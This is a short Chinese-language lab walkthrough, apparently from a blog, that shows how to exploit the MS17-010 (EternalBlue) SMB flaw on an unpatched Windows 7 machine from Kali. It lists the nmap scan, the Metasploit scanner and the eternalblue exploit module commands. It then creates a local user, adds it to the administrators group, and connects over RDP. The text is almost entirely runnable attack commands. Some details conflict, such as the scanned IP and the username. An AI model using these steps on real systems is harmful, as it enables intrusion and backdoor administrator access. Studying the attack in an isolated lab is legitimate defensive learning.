试验环境

(内网地址)

  • -win7(未打补丁开445) 10.77.0.128
  • kali 10.77.0.109

首先信息收集,探测

  • nmap意思一下

- nmap \-sS \-P0 \-A \-v 10.77.0.100

开的445

扫描漏洞

  • msfconsole 启动
1
msfconsole
  • 加载扫描exp

use auxiliary/scanner/smb/smb_ms17_010

1
show options

在这里插入图片描述

  • 设置目标ip
1
set RHOST 10.77.0.128 
  • 运行
1
run

在这里插入图片描述发现可以利用


漏洞利用

  • 加载攻击模块
1
use exploit/windows/smb/ms17_010_eternalblue
  • 设置参数
1
set RHOST 10.77.0.128
  • 运行
1
run

在这里插入图片描述
运行成功 进去了

可以直接CMD命令
在这里插入图片描述


权限很高
直接net user

1
2
net user 123 1234 /add(用户名 密码)
net localgroup administrators xxxx /add (将用户设置为管理员权限)

重新打开一个终端

1
rdesktop+IP

在这里插入图片描述